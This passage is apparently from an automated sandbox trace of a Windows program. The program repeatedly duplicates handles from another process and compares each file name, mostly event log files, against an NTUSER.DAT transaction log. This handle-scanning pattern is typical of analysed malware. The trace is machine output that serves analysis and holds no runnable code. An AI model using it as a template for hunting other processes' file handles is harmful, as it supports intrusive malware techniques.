lpExitCode=0x32ee30) returned 1 [0162.523] CloseHandle (hObject=0x1e4) returned 1 [0162.523] CloseHandle (hObject=0x194) returned 1 [0162.524] CloseHandle (hObject=0x1e8) returned 1 [0162.524] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.524] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.525] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.525] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.525] CloseHandle (hObject=0x1e4) returned 1 [0162.525] CloseHandle (hObject=0x194) returned 1 [0162.526] CloseHandle (hObject=0x1e8) returned 1 [0162.526] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.526] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.527] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.527] CloseHandle (hObject=0x1e4) returned 1 [0162.527] CloseHandle (hObject=0x194) returned 1 [0162.527] CloseHandle (hObject=0x1e8) returned 1 [0162.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.527] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.528] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.529] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.529] CloseHandle (hObject=0x1e4) returned 1 [0162.529] CloseHandle (hObject=0x194) returned 1 [0162.529] CloseHandle (hObject=0x1e8) returned 1 [0162.529] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.530] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.531] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.531] CloseHandle (hObject=0x1e4) returned 1 [0162.531] CloseHandle (hObject=0x194) returned 1 [0162.531] CloseHandle (hObject=0x1e8) returned 1 [0162.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.531] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.532] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.533] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.533] CloseHandle (hObject=0x1e4) returned 1 [0162.533] CloseHandle (hObject=0x194) returned 1 [0162.533] CloseHandle (hObject=0x1e8) returned 1 [0162.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.533] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.534] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.534] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.535] CloseHandle (hObject=0x1e4) returned 1 [0162.535] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.535] CloseHandle (hObject=0x194) returned 1 [0162.535] CloseHandle (hObject=0x1e8) returned 1 [0162.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.535] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.536] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.537] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.537] CloseHandle (hObject=0x1e4) returned 1 [0162.537] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.537] CloseHandle (hObject=0x194) returned 1 [0162.537] CloseHandle (hObject=0x1e8) returned 1 [0162.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.537] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.538] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.538] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.539] CloseHandle (hObject=0x1e4) returned 1 [0162.539] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.539] CloseHandle (hObject=0x194) returned 1 [0162.539] CloseHandle (hObject=0x1e8) returned 1 [0162.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.539] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.540] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.541] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.541] CloseHandle (hObject=0x1e4) returned 1 [0162.541] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.541] CloseHandle (hObject=0x194) returned 1 [0162.541] CloseHandle (hObject=0x1e8) returned 1 [0162.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.541] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.542] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.543] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.543] CloseHandle (hObject=0x1e4) returned 1 [0162.543] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.543] CloseHandle (hObject=0x194) returned 1 [0162.543] CloseHandle (hObject=0x1e8) returned 1 [0162.543] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.543] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.544] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.544] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.561] CloseHandle (hObject=0x1e4) returned 1 [0162.561] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.561] CloseHandle (hObject=0x194) returned 1 [0162.562] CloseHandle (hObject=0x1e8) returned 1 [0162.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.562] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.563] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.564] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.564] CloseHandle (hObject=0x1e4) returned 1 [0162.564] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.564] CloseHandle (hObject=0x194) returned 1 [0162.564] CloseHandle (hObject=0x1e8) returned 1 [0162.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.564] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.565] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.566] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.566] CloseHandle (hObject=0x1e4) returned 1 [0162.566] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.566] CloseHandle (hObject=0x194) returned 1 [0162.566] CloseHandle (hObject=0x1e8) returned 1 [0162.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.566] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.567] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.568] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.568] CloseHandle (hObject=0x1e4) returned 1 [0162.568] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.568] CloseHandle (hObject=0x194) returned 1 [0162.568] CloseHandle (hObject=0x1e8) returned 1 [0162.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.568] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.569] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.570] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.570] CloseHandle (hObject=0x1e4) returned 1 [0162.570] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.570] CloseHandle (hObject=0x194) returned 1 [0162.570] CloseHandle (hObject=0x1e8) returned 1 [0162.570] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.570] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.571] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.571] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.572] CloseHandle (hObject=0x1e4) returned 1 [0162.572] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.572] CloseHandle (hObject=0x194) returned 1 [0162.572] CloseHandle (hObject=0x1e8) returned 1 [0162.572] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.572] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.572] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.573] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.573] CloseHandle (hObject=0x1e4) returned 1 [0162.573] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.573] CloseHandle (hObject=0x194) returned 1 [0162.573] CloseHandle (hObject=0x1e8) returned 1 [0162.574] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.574] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.574] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.575] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.575] CloseHandle (hObject=0x1e4) returned 1 [0162.575] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.576] CloseHandle (hObject=0x194) returned 1 [0162.576] CloseHandle (hObject=0x1e8) returned 1 [0162.576] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.576] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.576] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.576] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.577] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.577] CloseHandle (hObject=0x1e4) returned 1 [0162.577] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.577] CloseHandle (hObject=0x194) returned 1 [0162.578] CloseHandle (hObject=0x1e8) returned 1 [0162.578] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.578] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.578] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.579] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.579] CloseHandle (hObject=0x1e4) returned 1 [0162.579] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.580] CloseHandle (hObject=0x194) returned 1 [0162.580] CloseHandle (hObject=0x1e8) returned 1 [0162.580] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.580] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.580] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.581] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.581] CloseHandle (hObject=0x1e4) returned 1 [0162.581] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.581] CloseHandle (hObject=0x194) returned 1 [0162.581] CloseHandle (hObject=0x1e8) returned 1 [0162.581] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.581] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.582] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.583] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.583] CloseHandle (hObject=0x1e4) returned 1 [0162.583] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.583] CloseHandle (hObject=0x194) returned 1 [0162.583] CloseHandle (hObject=0x1e8) returned 1 [0162.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.583] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.584] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.585] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.585] CloseHandle (hObject=0x1e4) returned 1 [0162.585] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.585] CloseHandle (hObject=0x194) returned 1 [0162.585] CloseHandle (hObject=0x1e8) returned 1 [0162.585] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.586] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.586] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.587] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.587] CloseHandle (hObject=0x1e4) returned 1 [0162.587] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.587] CloseHandle (hObject=0x194) returned 1 [0162.587] CloseHandle (hObject=0x1e8) returned 1 [0162.587] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.587] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.588] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.589] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.589] CloseHandle (hObject=0x1e4) returned 1 [0162.589] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", 